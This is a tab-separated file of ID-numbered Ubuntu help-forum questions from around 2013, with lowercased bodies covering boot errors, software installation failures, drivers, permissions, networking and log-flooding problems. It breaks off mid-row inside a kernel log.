305324	youtube videos stopped streaming	i have been dealing with this problem for a couple of days but could n't find a solution . i 've posted on a forum before but nobody answered . any help ? a couple of days ago a problem started to occur . i ca n't watch youtube videos anymore . when i open a video , the animation goes on and on ... until the message `` an error has occurred '' . very very very rarely sometimes a video loads . ( today it never happened , yesterday only once ) like i said , a couple of days ago it was all working . i did n't do any updates . after this problem , i 've installed every update , did n't solve the problem . it is not browser specific , google chrome , chromium , firefox , opera ... all have the same problem . it is youtube specific , i can watch videos on facebook ( not loaded through youtube ) and vimeo and more . i have reinstalled the flash-plugin , did n't solve . ( yet it is not about flash ) it is not about my network , using the same network , windows laptop , iphone , android tablet all load v ubuntu 12.04 lts 32 bit $ uname -a linux marvin 3.2.0-45-generic-pae # 70-ubuntu smp wed may 29 20:31:05 utc 2013 i686 i686 i386 gnu/linux $ dpkg -l |grep `` chrome\|firefox\|opera\|chromium\|flash '' ii adobe-flash-properties-gtk 11.2.202.285-0precise1 gtk+ control panel for adobe flash player plugin version 11 ii adobe-flashplugin 11.2.202.285-0precise1 adobe flash player plugin version 11 ii chromium-browser 25.0.1364.160-0ubuntu0.12.04.1 chromium browser ii chromium-browser-l10n 25.0.1364.160-0ubuntu0.12.04.1 chromium-browser language packages ii chromium-codecs-ffmpeg 25.0.1364.160-0ubuntu0.12.04.1 free ffmpeg codecs for the chromium browser ii eject 2.1.5+deb1+cvs20081104-9 ejects cds and operates cd-changers under linux ii firefox 21.0+build2-0ubuntu0.12.04.3 safe and easy web browser from mozilla ii firefox-globalmenu 21.0+build2-0ubuntu0.12.04.3 safe and easy web browser from mozilla - unity menubar integration ii firefox-gnome-support 21.0+build2-0ubuntu0.12.04.3 safe and easy web browser from mozilla - gnome support ii firefox-locale-en 21.0+build2-0ubuntu0.12.04.3 english language pack for firefox ii google-chrome-stable 27.0.1453.110-r202711 the web browser from google ii libcrypt-passwdmd5-perl 1.3-10 interoperable md5-based crypt ( ) for perl ii opera 12.15.1748 fast and secure web browser and internet suite ii xserver-xorg-video-openchrome 1:0.2.904+svn1050-1 x.org x server -- via display driver any suggestions ? sorry if it is a repost , it 's hard to find this problem in the dozens of `` restricted-extras not installed '' problems ...
305336	flashcam does n't compile -- videodev.h not found	i 'd like to compile flashcam 1.4.5 from source on lubuntu 13.04 , but it complains : cc -g -shared -fpic -o flashcamhook.so flashcamhook.c flashcamhook.c:31:28 : fatal error : linux/videodev.h : no such file or directory i have linux-headers-generic installed along with the headers for my current kernel ( 3.8.0-23-generic ) . i have installed libv4l-0 , libv4lconvert0 and libv4l-dev . build-essentials is installed . i tried sym-linking ( with absolute paths ) videodev.h to libv4l1-videodev.h , then to videodev2.h , but this does n't help either . working directory is /tmp/flashcam-1.4.5 . what am i missing ? any ideas ?
305337	unable to open ubuntu	i did ubuntu 13.04 installation on windows 8 64 bit machine.the installation went fine but after booting when i select ubuntu os it is saying boot error and system is not able to load file \ubuntu\winboot\wubildr.mbr..kindly give me solution for this i need it on urgent basis
305341	steam on ubuntu 13.04 won`t launch garry`s mod . error : could not load library content ( unknown error )	i have steam installed on ubuntu 13.04 with garrys mod , downloaded . when i try to launch the game , it returns with an error `` could not load library content ( unknown error ) '' . team fortress 2 seems to work just fine . the graphics are intel core i5 intergrated graphics ( sandy bridge ) . tried to reinstall the game , that didnt work .
305344	how do i install ubuntu core on an sd card for use on a pandaboard ?	i 'm a beginner with linux . i do n't know much about filesystems , root directories , kernels , etcetera . i 've already looked at the official ubuntu core installation example . this and other guides i have read , are either too vague for me or do n't make sense to me at all . for example , the guide says `` you will need to have the ubuntu core root filesystem in an accessible path . '' and instructs me to type in $ sudo tar zxvf $ path_to_root_fs . as if i should already know the $ path_to_root_fs , but i do n't . it also skims over the process of downloading and installing the correct kernel as if i should already know how to do this . what are the steps for installing ubuntu core onto an sd card for use on a pandaboard ?
305346	wine - not showing content of windows	today i switched from windows to ubuntu , so i am a beginner . few years ago i started to use a windows program to generate invoices , so i got a lot of invoices in my archive and i need to continue using this program on ubuntu . so i installed wine on my ubuntu and then my invoice generator too . everything is working fine , program loads correctly . but : the problem is that the text does not show in windows . take a look at this screenshot ( in this dialogue should be a text asking license key ) : http : //i44.tinypic.com/2v3076o.png does anybody have some experience with this ? what should i install or configure ? thanks in advance for your advice !
305354	can i have two internal disks - one ext4 and one ntsf ?	can i have two internal disks - one ext4 and one ntfs ? i am putting together a small home server with ubuntu desktop . i also want to use it for windows 7 backups , so if i install a ntsf hdd as well as the primary ext4 hdd will it work ? meaning , will i be able to have access to the ntsf hd from within ubuntu to share it to the network ? thanks !
305359	is it possible to perfrom ubuntu installation on dynamic hd partition or should i make it to static ?	when i boot from usb and select the partition for the installation , there is an error message.is this due to my hard drive partition in windows is dynamic ? if so how do i make it to static and install ubuntu along with windows ?
305363	newly-upgraded 13.04 hanging randomly ?	i just upgraded to 13.04 on both my desktop and my laptop , but only my desktop is having this problem . it spontaneously hangs - i could be doing anything : trying to pull up the launcher , switching windows , clicking a link , typing an email - and becomes totally unresponsive ( though the cursor moves ) for anywhere from two to ten minutes . sometimes it unfreezes and then freezes again a second later , sometimes it clears right up and performs fine for the next half-hour . i 've also seen a couple of errors - 'system program problem detected , ' and an error related to ( i think ) usr/bin/xorg that i have n't been able to replicate yet . these errors do n't coincide with the hanging as far as timing goes . i 'm still pretty new to ubuntu , so i 'm learning my way around yet , but i 'm picking up fast on the basics .
305364	how to change my password ?	i installed ubuntu 13.04 through wubi file , where we set username & passwd preinstalling of ubuntu , but now i could n't login with my username even though i typed the correct password , as it is showing it as wrong password .
305368	why ca n't i install application in software-center ?	the main problem is that i ca n't install steam basically , but i tried with other applications too and none of those applications will install . i run software center via terminal and this is the log that i get when i try to install steam . i click on steam and then i click on buy , it redirects me to login and i login , so authentication pass and i 'm logged in but i still get an error to buy application again and this time it wo n't redirect me to login , it just wo n't install . here 's log file 2013-06-07 22:19:58,630 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/dbus/proxies.py ' , 410 , '_introspect_error_handler ' ) ' 2013-06-07 22:19:58,630 - dbus.proxies - error - introspect error on :1.11 : /org/freedesktop/networkmanager : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.accessdenied : rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.54 '' ( uid=1000 pid=2318 comm= '' /usr/bin/python /usr/bin/software-center `` ) interface= '' org.freedesktop.dbus.introspectable '' member= '' introspect '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.11 '' ( uid=0 pid=574 comm= '' networkmanager `` ) 2013-06-07 22:19:58,630 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/share/software-center/softwarecenter/netstatus.py ' , 122 , '__init_network_state ' ) ' 2013-06-07 22:19:58,630 - root - warning - failed to init network state watcher 'org.freedesktop.dbus.error.accessdenied : rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.54 '' ( uid=1000 pid=2318 comm= '' /usr/bin/python /usr/bin/software-center `` ) interface= '' org.freedesktop.networkmanager '' member= '' state '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.11 '' ( uid=0 pid=574 comm= '' networkmanager `` ) ' 2013-06-07 22:19:58,759 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/share/software-center/softwarecenter/netstatus.py ' , 151 , 'test_ping ' ) ' 2013-06-07 22:19:58,759 - root - info - attempting one time ping of archive.ubuntu.com to test if internet connectivity exists . 2013-06-07 22:19:58,781 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-06-07 22:19:58,784 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-06-07 22:19:58,880 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/share/software-center/softwarecenter/netstatus.py ' , 168 , 'test_ping ' ) ' 2013-06-07 22:19:58,880 - root - info - ping output : 'internet connection available ! ping archive.ubuntu.com ( 91.189.92.201 ) 56 ( 84 ) bytes of data . 64 bytes from urayuli.canonical.com ( 91.189.92.201 ) : icmp_req=1 ttl=49 time=55.6 ms -- - archive.ubuntu.com ping statistics -- - 1 packets transmitted , 1 received , 0 % packet loss , time 0ms rtt min/avg/max/mdev = 55.611/55.611/55.611/0.000 ms ' 2013-06-07 22:19:59,032 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-06-07 22:19:59,188 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-06-07 22:19:59,197 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2013-06-07 22:20:06,863 - softwarecenter.db.database - info - reopen ( ) database 2013-06-07 22:20:06,863 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-06-07 22:20:07,160 - softwarecenter.db.update - info - skipping region restricted app : 'bulleti d'esquerra de calonge i sant antoni ' ( not whitelisted ) 2013-06-07 22:20:07,493 - softwarecenter.db.update - info - skipping region restricted app : 'comentarios web ' ( not whitelisted ) 2013-06-07 22:20:10,229 - softwarecenter.ui.gtk3.app - info - software-center-agent finished with status 0 2013-06-07 22:20:10,229 - softwarecenter.db.database - info - reopen ( ) database 2013-06-07 22:20:10,229 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-06-07 22:20:17,910 - softwarecenter.backend - info - add_repo_add_key_and_install_app ( ) 'private-ppa.launchpad.net/commercial-ppa-uploaders/steam/ubuntu precise main ' '33e0e91bdd8e7f4b53837f09e131728675254d99 ' 'steam-launcher' 2013-06-07 22:20:17,917 - softwarecenter.backend - error - authenticate_for_purchase failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/backend/installbackend_impl/aptd.py '' , line 562 , in add_repo_add_key_and_install_app yield self.authenticate_for_purchase ( ) file `` /usr/lib/python2.7/dist-packages/defer/__init__.py '' , line 473 , in _inline_callbacks result = gen.throw ( result.type , result.value , result.traceback ) file `` /usr/share/software-center/softwarecenter/backend/installbackend_impl/aptd.py '' , line 502 , in authenticate_for_purchase yield policykit1.check_authorization_by_name ( name , action , flags=flags ) authorizationfailed : org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.54 ' } ) : org.debian.apt.install-purchased-packages from the last line i see authorization failed but i do n't know if this is authorisation to ubuntu but i have already logged in . the second time when i tried to install the application i started software-center via terminal and went to file > install previous purchases , and there was steam . when i clicked i had install button instead of buy but still was n't able to install it . the same thing happens when i try to install filezilla or any other app . i even reinstalled complete os and again having same problem . now i do n't even have terminal to start it from there .
305370	/usr/bin/ld - can not find lib	i am compiling from source and i have the error : /usr/bin/ld : can not find -lct how to fix it ? thanks . i tryed : sudo apt-get install libxt-dev but it doesnt help .
305371	how do i get my nvidia 620m working in ubuntu 13.04 ?	i have bumblebee stable installed but the 620m is n't working , more details here : http : //ubuntuforums.org/showthread.php ? t=2152186
305372	calibrate unitec touchscreen	i have a dmc 19 inch wide touchpanel . the evdev recognizes it and it works perfectly normal despite that a 1 inch drift . it does not take into consideration the calibration parametres i enter in 10-evdev.conf any ideas
305380	ubuntu is slow on netbook , running on flash drive . will this persist on a full install ?	i got a new asus eee pc 1025c flare ( intel atom , 2gb ram ) so i loaded ubuntu 13.04 on a flash drive and tried to boot from there . and it was slow . it takes about 10 seconds to load the dashboard , and even longer to do anything else . i tried tweaking it using compizconfig , but it 's still slow . i ca n't do a full install yet because the laptop is still under the 1-week-factory-defect warranty . will ubuntu still be this slow once i do a full install ? should i use x/lubuntu instead ? ( i 'd rather not since i quite like unity ) ps : i have some experience with ubuntu ; i used it on a bigger laptop and i love it . the windows starter that came with the laptop is running fine , but i 'd rather have ubuntu with this thing .
305381	remove grub using from inside windows 7	last year i installed ubuntu on my pc and everything worked fine then one day i accidentally removed the ubuntu partition but the boot menu that allow u to choose between windows 7 and ubuntu was still there . found a guide that allow u to remove ubuntu or other from this menu using command prompt inside windows 7 ( no disk , no downloads ) ( everything worked fine then ) now i need these command again but i cant find them anywhere anyone can help please ? ? ? ? ? ?
305386	laptop that comes with windows 8 does not show grub	i have a sony vaio sve14a27cxh that came with windows 8 and uefi bios from factory . i have been trying to install ubuntu 13.01 with no success . i have already suffered with `` operating system not found '' because i have n't turned off safe boot . but now i am using uefi without safe boot . this is the only way i do n't get that message when i try to turn on my computer . but it always goes directly to windows 8 . after the vaio screen , grub does not show up , so i have no way of accessing ubuntu other than my live usb drive . maybe i misunderstood the instructions to install ubuntu in a computer with uefi bios , but this current configuration is the only one where i can still use windows at least . thanks in advance .
305394	ubuntu touch on sii phone	i have the samsung galaxy sii straight talk phone . i want to install ubuntu touch . the model is different from https : //wiki.ubuntu.com/touch/devices/i9100 should it still work with my phone ?
305406	can you put pictures from the pc to usb , cd or external hard drive	my computer wo n't work so im going to see if i can use ubuntu to recover my data . i am planning to use ubuntu to put the pictures from my comuter , to my external hard drive , where all my pictures are . thanks
305410	how to fill the screen with a 32 '' tv ?	how do i get display to spread out and fill screen on a 32 inch tv that i use as a monitor ?
305411	how do you make the scripts in /home/ $ user/bin accessible using sudo ?	how do you make the scripts in /home/ $ user/bin accessible using sudo ? as in : sudo $ nameofscript in using ubuntu 12.04
305415	software sources crashes	software sources crashes when i run it from terminal i get this error : sudo software-properties-gtk traceback ( most recent call last ) : file `` /usr/bin/software-properties-gtk '' , line 38 , in < module > from softwareproperties.gtk.softwarepropertiesgtk import softwarepropertiesgtk file `` /usr/lib/python2.7/dist-packages/softwareproperties/gtk/softwarepropertiesgtk.py '' , line 45 , in < module > from softwareproperties.softwareproperties import softwareproperties file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 53 , in < module > from ppa import addppasigningkeythread , expand_ppa_line file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 31 , in < module > import pycurl importerror : librtmp.so.0 : can not open shared object file : no such file or directory [ 1 ] + stopped sudo software-properties-gtk just upgraded the distribution , it seems like it is broken in some way .
305417	adobe flash plugin : no full screen	in my lubuntu 13.04 ( with gnome shell 3.8 ) , flash videos wo n't go to full screen in certain flash players ( i.e . on certain sites ) . - actually in most players , that means it does n't work at all . upon left-click on the fullscreen-button , i see a flicker as if it did got to full-screen , but then it stays standard size , kinda like a pop-up ad being killed by ad-block . - some players have a `` toggle fullscreen '' option available on right-click menu , this is the only option that works for me now . in this case , i have to press and hold the right mouse button and release it over the `` fullscreen '' menu entry . the menu disappears when releasing the mouse button . - only exception i found so far : youtube , which works normally with left click on the fullscreen-button . my current flash-plugin version is 11.2.202.285ubuntu0.13.04.1 . i wonder if gnome shell might be messing with flash ? is anyone else experiencing this problem ? edit : this problem is present in firefox , opera and chromium browsers . the graphics card i 'm using ( as reported in gnome settings > details ) is geforce 8100/nforce720a/integrated/sse2
305424	how to troubleshoot high cpu problems related to postgres and postmaster service ?	i 'm using an open source ( rhce 6.2 ) based machine running siem software , when i do the top command i see postgress postmaster both eating 96 % of cpu usage ? is there a way to pin-point or see what causing these service to stack up ? thanks .
305425	itunes on ubuntu 12.04	how do i install apple itunes on ubuntu 12.04 in order to connect my iphone with my pc ? i tried playonlinux , but it says `` wine does not support usb yet '' when trying to install it .
305428	ssh connections dropping after two or so lines	i 'm actually having a bit of an odd problem . i 'm running ubuntu server 12.04 , with a minimal set of packages : the base system , sshd , and an irc server . i must allow someone else to configure the server to connect to their irc network . however , they seem to be dropping after two lines of ls or cat . odder , this only happens on this server , and i have n't been able to reproduce it at all using putty or an ssh client . where should i look to diagnose this ? auth.log shows a normal connection and authentication and does not give any details about the drop . fail2ban has no violations with the originating ip address . this is a virtual machine with a forwarded port ( it is bridge mode and has normal network connectivity ) . i can connect locally , across the lan , and from a remote location with putty without any problems . the other person can connect using ssh on linux but encounters the connection dropping . logs from client . server-side logs show nothing out of the ordinary .
305430	options in bash commands	are the commands ' options case sensitive ? i.e . i did rm -r directory and rm -r directory and i got the same results , whereas when i did ls -r directory and ls -r directory i got different answers .
305431	installing .sty packages with kile	i have recently installed ubuntu 13.04 on my laptop . i tex a lot and i like to use kile for that . i have installed all the packages that exist on the ubuntu repositories . there are still some packages that i wish to install . i have the required .sty ( or .cfg ) files for them . how do i go about installing them ? i would like to make my installation system-wide . i have read many many threads regarding this online but nothing seems to work for me ! i do n't know why . possibly because i 'm just not doing it right . ( i 'm new to ubuntu ) . any help would be appreciated . thanks .
305432	how/where do i get ubuntu drivers ?	i have an acer aspire 5745 laptop with all it 's stock hardware , when i install ubuntu 12.04.2 via windows installation it works , except for the drivers . there are no drivers installed , and i have spent the last 2 days looking for a place to download them . most sites i have found tell me what to do once i already have the drivers , or give commands to an outdated version that no longer work . first time linux user please help
305443	i keep getting prompted to create an ubuntu software center account ?	i 'm on ubuntu 13.04 and every so often , i get prompted to create an ubuntu software center account . the thing is , i already have one . and when i log it in , the prompt will go away but it will pop back up when i 'm on usc again . is there something i can do to make it remember my login info ? it 's starting to get pretty annoying .
305444	symbolic link for lampp is n't working 100 %	note : i 'm a beginner in ubuntu i 've been trying for some time to set xampp up on my ubuntu machine so i can develop my php projects . i found out that i ca n't directly modify the htdocs folder because it is located in a protected part of the system . then i found out that creating a symbolic link of my /home/ ( user ) /projects inside my /opt/lampp/htdocs folder would solve it . it kinda did , but not totally . the symbolic link does work because lampp can access the files that are in /home/ ( user ) /projects but it wo n't read subfolders . i read something about having to change the permissions but i 'd rather avoid it for security purposes . any idea how to make it work ?
305445	problems when booting ubuntu 12.04 on separate hard drive	i just got ubuntu 12.04 ( also have it on my chromebook ) , and i installed it on my seperate hard drive . whenever i try to boot my computer up , i get windows boot manager , as expected . but then there 's a problem . when i click `` ubuntu '' , this error message pops up : file : \ubuntu\winboot\wubildr.mbr status : 0xc000007b i have seen other questions like this , but this is on my separate hard drive . it might be that i have a uefi motherboard . i checked for a `` legacy boot '' option , but ca n't find it . thanks in advance !
305446	ubuntu provides certificates ?	i want to know if ubuntu provides certificates to commercial applications ? example : '' appname certified by ubuntu ''
305455	problems with 3d after upgrading	i upgraded to ubuntu 13.04 . i use sweet home 3d . after upgrading , my driver for graphics gallium 0.4 on amd rv 610 does n't display correctly anymore in 3d . the screen fills with pixels and strange signs when moving with the mouse , it flickers and i ask myself if i should upgrade the graphics driver ? but i do n't know how to do that .
305457	motherboard issue with installing 12.04 ?	i built myself a gaming desktop and i tried installing 12.04 on a new eufi motherboard but , it missed the os . i tried installing 13.04 and it worked perfectly . is there a way to install 12.04 also on my hard as second partition . 12.04 was really what i wanted to install as my main os .
305458	how to update ubuntu to i386 from terminal or a .iso file ?	all right . i re-install my ubuntu 64bits , but now it 's very slow . i 'm downloading the 32bits .iso from transmission and i want know if has any possibility to `` update '' from this iso file . if do n't , can i update to 32bits from terminal ? i do n't have any other dvd to put the iso ... that 's why i am asking ! i 'm using 13.04 raring ringtail .
305465	ipv6 autoconfig is n't working on 13.04	i have several computers with various operating systems on my lan , and one of them with ubuntu 13.04 64 bit , is the only box that ca n't autoconfigure itself an ipv6 address . rdisc6 times out on it , whereas it succeeds on all my other linux boxes . what 's up ? on the box on which ipv6 does n't work , it has a realtek 8187b wifi card : [ 18:50:19 ] domitille : ~ alisonc $ rdisc6 wlan1 soliciting ff02 : :2 ( ff02 : :2 ) on wlan1 ... timed out . timed out . timed out . no response . on my raspberry pi with raspbian : pi @ raspberrypi ~ $ rdisc6 eth0 soliciting ff02 : :2 ( ff02 : :2 ) on eth0 ... hop limit : 64 ( 0x40 ) stateful address conf . : no stateful other conf . : yes router preference : medium router lifetime : 30 ( 0x0000001e ) seconds reachable time : unspecified ( 0x00000000 ) retransmit time : unspecified ( 0x00000000 ) prefix : 2001:470 : xxxx : :/64 valid time : 86400 ( 0x00015180 ) seconds pref . time : 14400 ( 0x00003840 ) seconds recursive dns server : 2001:4860:4860 : :8888 recursive dns server : 2001:4860:4860 : :8844 recursive dns server : 2001:470:20 : :2 dns servers lifetime : 10 ( 0x0000000a ) seconds mtu : 1480 bytes ( valid ) source link-layer address : 10 : bf:48 : xx : xx : xx from fe80 : :12bf:48ff : fexx : xxxx on an old laptop with ubuntu 13.04 32 bit , atheros ar5212 wifi card : owner @ owner-thinkpad-x60 : ~ $ rdisc6 wlan0 soliciting ff02 : :2 ( ff02 : :2 ) on wlan0 ... hop limit : 64 ( 0x40 ) stateful address conf . : no stateful other conf . : yes router preference : medium router lifetime : 30 ( 0x0000001e ) seconds reachable time : unspecified ( 0x00000000 ) retransmit time : unspecified ( 0x00000000 ) prefix : 2001:470 : xxxx : :/64 valid time : 86400 ( 0x00015180 ) seconds pref . time : 14400 ( 0x00003840 ) seconds recursive dns server : 2001:4860:4860 : :8888 recursive dns server : 2001:4860:4860 : :8844 recursive dns server : 2001:470:20 : :2 dns servers lifetime : 10 ( 0x0000000a ) seconds mtu : 1480 bytes ( valid ) source link-layer address : 10 : bf:48 : xx : xx : xx from fe80 : :12bf:48ff : fexx : xxxx i 'm using an asus rt-n16 as my ipv6 router , with a tunnel by hurricane electric . the wlan connected computers are connected to a netgear wndr3700v3 configured as a wireless ap . any pointers as to what to look for in the configuration on domitille would be greatly appreciated .
305468	multiple workspace backgrounds without ccsm	is there any way to have a different background for each workspace without using ccsm ? i 've read a few horror stories and would rather avoid it if possible . i 'm using raring ringtail ( 13.04 )
305472	a user keeps giving the wrong group permissions on new files	i have a number of services on an ubuntu 12.04 server and i 'm making each of them run under their own user account instead of running under my account ( for improved security as well as seeing which applications are consuming the most resources ) . one of my services ( we 'll call this application-foo ) downloads a file and saves it locally to a downloads folder in my home directory . another service ( we 'll call this application-bar ) then finds the downloaded file and moves it to another location . user-foo downloads the file using application-foo user-bar moves the downloaded file using application-bar both user-foo and user-bar are members of the downloads group the downloaded file is sent to : /home/kris/downloads that downloads folder has permissions set to 775 with kris : downloads as the owners . i 've set the user and group to be sticky bits . when user-foo finishes downloading a file and puts it to my downloads folder , it 's setting the permissions as : user-foo : downloads 755 instead of : kris : downloads 775 this is a problem because user-bar is part of the downloads group , and since that file now does not have write permission on the group , user-bar is unable to delete the file after moving it . i 've tried creating a .profile file and setting umask=002 for /home/user-foo , but that did n't work . i 've also tried setting a global umask value in /etc/profile and /etc/login.defs ( which did n't work either ) . i even tried using setfacl to make the g : :rwx and g : downloads : rwx , but that did n't change anything . what am i missing ? edit : just to add , if i log in as this user ( sudo su user-foo ) , enter my /home/kris/downloads directory , and create a new directory ( mkdir test ) , the created directory has permissions set correct at 775 . but for whatever reason , when application-foo creates the directory , it 's setting the permissions incorrectly at 755 .
305473	where 's the default video monitor config file	when i boot my laptop , with an external video monitor attached , the lcd video screen on the laptop comes up in what looks like 1024x768 ... which i assume is because it 's cloning displays , and that the most common setting that either will take is 1024x758 . i 'd like it to come up with 1280x800 on the lcd laptop screen , and either no display on the external monitor , or 1920x1080 . there used to me a xorg.conf file , which is where i assume that i might have set this up , but this file does n't exist in raring . so ... how do i accomplish this ? please advise , cheers , al
305476	computer went to sleep during upgrade to 13.04 , i get a blinking start up screen after restart	i updated from 12.04 to 13.04 , and in the middle of running the upgrade , i accidentally put the computer to sleep ( hp mini 2011 ) , thinking all was lost i stupidly restarted the computer . now there is nothing expect a repeating blinking bit of the start up procedure . i am really new at this so i ca n't be much more specific . i donât have anything on a usb and this computer has no cd . thanks !
305477	ubuntu 12.4.2 server , after installation black screen with _ on the left top ( 3 times the same ) ( no grub )	hi i have problem with ubuntu server 12.4.2 64bit on ibm server 366 series 4x xenon 64bit 16gb ram , after installation first time with grub in bootloader screen i cant change anything and after 15 minutes run black screan , nest installation there is the same black screen but load system i have installed ubuntu graphic terminal and ssh and after few minutes system stop and after restart black screen and nothing for 1h , third installation after all instalation proces i chose to not install grub and after all process i see only black screen with left top screan ticking _ , any suggestions ? , i tried to install 32 bit system and working fine but cant install 64bit java on it and thats why i need 64bit system , and yes all 4 processors are 64bit xenon 3,16 ghz 800mhz fsb ht , 2x hdd 73gb 10k hotswap sas server raid 8i , 16gb ram , integrated graphic card . any suggestions ? ... help !
305479	best ubuntu flavor for my system ?	i am pretty new to ubuntu and linux in general . i have a dell mini 10 with 1gb of ram . would like to know if it would be able to run ubuntu 10.04 without any issues/lag or should i settle for something like xubuntu ? i would choose performance over graphics any day . thanks in advance .
305484	how to download teamspeak 3 unto ubuntu 12.04 ?	i 've been trying to download it from the website , using this link : http : //www.teamspeak.com/ ? page=downloads i use a 86-bit ubuntu , but when i download the file , i ca n't get it to run , and open up . i need someone to show me how to download it , and run correctly .
305488	does installing ubuntu from itself on a flash drive install it on my hard drive ?	i apologize for the horribly worded title , but it 's all i could think of . anyway , i have a macbook pro and i 've followed the instructions here : http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-mac-osx i current have ubuntu up and running with the trial edition or something ( i apologize again for my horrible terminology ) , just not the full install . i have a `` install ubuntu 12.04.2 lts '' on my desktop , but i have hesitated to click it because i do not want it to install on my hard drive . that would be a disaster . anyway , my question is this : will that file install the full ubuntu on my flash drive only , or on my hard drive ? thanks a bunch in advance !
305490	start screensaver on still pictures	i have an ubuntu box connected to a plasma tv . still images reduce the lifetime of plasma tvs and may cause pixel-burn . i am looking for a technique to start the screensaver if the picture on the monitor is still for a while but prevents the screensaver if the picture is moving . here is my not-working piece of python code but any solution using python or otherwise is good for me : import gtk.gdk import time from subprocess import * w = gtk.gdk.get_default_root_window ( ) sz = w.get_size ( ) while ( true ) : buf1 = gtk.gdk.pixbuf ( gtk.gdk.colorspace_rgb , false,8 , sz [ 0 ] , sz [ 1 ] ) pb1 = buf1.get_from_drawable ( w , w.get_colormap ( ) ,0,0,0,0 , sz [ 0 ] , sz [ 1 ] ) time.sleep ( 3 ) buf2 = gtk.gdk.pixbuf ( gtk.gdk.colorspace_rgb , false,8 , sz [ 0 ] , sz [ 1 ] ) pb2 = buf2.get_from_drawable ( w , w.get_colormap ( ) ,0,0,0,0 , sz [ 0 ] , sz [ 1 ] ) pix1 = pb1.get_pixels ( ) pix2 = pb2.get_pixels ( ) diffs = 0 for i in range ( len ( pix1 ) ) : if ( pix1 [ i ] ! = pix2 [ i ] ) : diffs = diffs + 1 if ( diffs > 10000 ) : call ( [ `` xset '' , `` dpms '' , `` force '' , `` on '' ] ) call ( [ `` gnome-screensaver-command '' , `` -- exit '' ] )
305495	13.04 - rsyslogd eating all the cpu it can	i 'm on a vps on ramnode.com , virtualized using openvz , the installed os was ubuntu 12.10 but i ran do-release-upgrade to upgrade it to 13.04. rsyslogd was consuming ~150 % cpu , i really do n't know much about linux but i ran at someone 's advice strace -c -p `pidof rsyslogd` on it , and here 's the result : % time seconds usecs/call calls errors syscall -- -- -- -- -- -- -- -- - -- -- -- -- -- - -- -- -- -- - -- -- -- -- - -- -- -- -- -- -- -- -- 100.00 37.912236 9478059 4 select 0.00 0.001000 500 2 write 0.00 0.000000 0 14 gettimeofday 0.00 0.000000 0 4 futex -- -- -- -- -- -- -- -- - -- -- -- -- -- - -- -- -- -- - -- -- -- -- - -- -- -- -- -- -- -- -- 100.00 37.913236 24 total so seemingly it 's spending its time on that select syscall , but i do n't know what that means : ( running strace -p `pidof rsyslogd` gives only one line until i interrupt it : select ( 1 , null , null , null , { 22 , 56702 } ^c < unfinished ... > what can be causing this ? what can i do to fix it ? edit : tail /var/log/kern.log gives me this : jun 7 21:42:26 camilo kernel : last message repeated 14010362 times jun 7 21:43:26 camilo kernel : last message repeated 13755525 times jun 7 21:44:26 camilo kernel : last message repeated 13745228 times jun 7 22:03:44 camilo kernel : imklog 5.8.11 , log source = /proc/kmsg started . jun 7 22:03:44 camilo kernel : can not read proc file system : 1 - operation not permitted . jun 7 22:04:14 camilo kernel : last message repeated 6927277 times jun 7 22:05:14 camilo kernel : last message repeated 13931106 times jun 7 22:06:14 camilo kernel : last message repeated 13864233 times jun 7 22:09:46 camilo kernel : imklog 5.8.11 , log source = /proc/kmsg started . jun 7 22:09:46 camilo kernel : can not read proc file system : 1 - operation not permitted . that does n't sound good : ( the kernel is 2.6.32-042stab076.8 and i do n't think i can fiddle with it .
305498	black screen after post on install 12 or 13.04	i am trying to install ubuntu 13.04 ( i also tried with 12.10 ) on an ione gx31 with an e8400 processor . i run the dvd and it gets to the screen with the keyboard and little man then the screen flickers and i get nothing from there . if it 's of any help i can put in a macpup 5.2.8 or vista and it will boot without screen issues . any suggestions ?
305503	tv tuner cards loaded but can not tune	i have installed two separate pci tv tuner cards in my hp proliant n40l microserver running ubuntu 12.04.2 lts . both cards are successfully recognized and registered as dvb-t cards attempting to use dvb utilities ( scan , w_scan ) or other software ( tvheadend ) returns no signal . there are no errors messages in dmesg ( see below ) . one of the cards has successfully been used in a windows pc plugged into the same antenna cable , so i feel confident that the hardware and signal are fine . what are the next steps to troubleshoot this issue ? [ 10.500910 ] dvb : registering adapter 0 frontend 0 ( realtek dvb-t rtl2832 ) ... [ 10.503616 ] input : ir-receiver inside an usb dvb receiver as /devices/pci0000:00/0000:00:04.0/0000:03:00.0/0000:04:00.2/usb4/4-1/input/input2 [ 10.503795 ] dvb-usb : schedule remote query interval to 287 msecs . [ 10.503802 ] dvb-usb : usb dvb-t device successfully initialized and connected . [ 10.503833 ] dvb-usb : found a 'usb dvb-t device ' in warm state . [ 10.503844 ] dvb-usb : will pass the complete mpeg2 transport stream to the software demuxer . [ 10.507107 ] dvb : registering new adapter ( usb dvb-t device ) [ 10.529997 ] rtl2832u usb_init_bulk_setting : usb2.0 high speed ( 480mb/s ) [ 10.765649 ] rtl2832u check_tuner_type : fc0012 tuner on board ... [ 10.875461 ] cx25840 3-0044 : loaded v4l-cx23885-avcore-01.fw firmware ( 16382 bytes ) [ 10.907187 ] tuner 1-0061 : tuner -1 found with type ( s ) radio tv . [ 10.925702 ] xc4000 1-0061 : creating new instance [ 10.926262 ] xc4000 : device not found at addr 0x61 ( 0xffff ) [ 